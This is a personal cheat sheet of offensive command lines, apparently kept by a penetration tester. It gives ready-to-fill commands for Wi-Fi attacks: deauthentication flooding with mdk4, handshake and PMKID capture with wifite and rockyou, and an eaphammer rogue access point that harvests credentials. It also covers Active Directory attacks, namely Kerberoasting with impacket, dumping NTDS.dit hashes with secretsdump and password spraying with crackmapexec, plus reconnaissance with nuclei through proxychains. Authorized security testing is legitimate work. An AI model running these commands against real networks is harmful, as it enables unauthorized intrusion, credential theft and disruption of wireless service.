Just some cheat sheets for things I sometimes forget the syntax for.


  • airodump-ng --band abg --wps --showack --ignore-negative-one --beacons --write {filename} {inet}
  • mdk4 {inet} d -w {whitelist filename} -c h:1200 -s 20 -x
  • service NetworkManager stop; service wpa_supplicant stop; service networking stop; killall wpa_supplicant; for i in `iw dev |grep -i interface |awk '{print $2}'`; do ip link set $i down; iw $i set monitor control; ip link set $i up; xterm -hold -e 'wifite -p 120 --new-hs --dict /usr/share/wordlists/rockyou.txt --pmkid-timeout 300 -inf -mac -ic --skip-crack -i $i' ; done
  • eaphammer --bssid {bssid} --essid {essid} --channel {CH} --wpa 2 --auth wpa-eap --interface {inet} --creds

Windows Environments

  • impacket-GetUserSPNs -target-domain {domain} -usersfile {File containing users to request spn for} -dc-ip {dcip} -request {domain}/{login}:{pass}@{target IP} 
  • impacket-GetUserSPNs -target-domain {domain} -dc-ip {dcip} -request {domain}/{login}:{pass}@{target IP} # this should grab whatever spn is available
  • impacket-GetUserSPNs -target-domain {domain} -dc-ip {dcip} -request -request-user {specific user} {domain}/{login}:{pass}@{target IP}
  • impacket-secretsdump -system ../registry/SYSTEM -security ../registry/SECURITY -ntds ntds.dit local
  • crackmapexec smb {target} -u '' -p '' --shares
  • crackmapexec smb {target} -u {login/userlist} -p {pass/passlist} --users


~~~Use a config file~~~~


  • nuclei {target}
  • nuclei -t {template(s) to use} {target}
  • echo {target} | nuclei
  • proxychains -q amass enum -d {target} |proxychains -q /root/go/bin/httpx -ports 5000,8443,9443,10000,8080,9323,2375,2376,8000,80,443,9443,7547,10250,6443 -silent| proxychains -q /root/go/bin/nuclei >> nuclei-out.log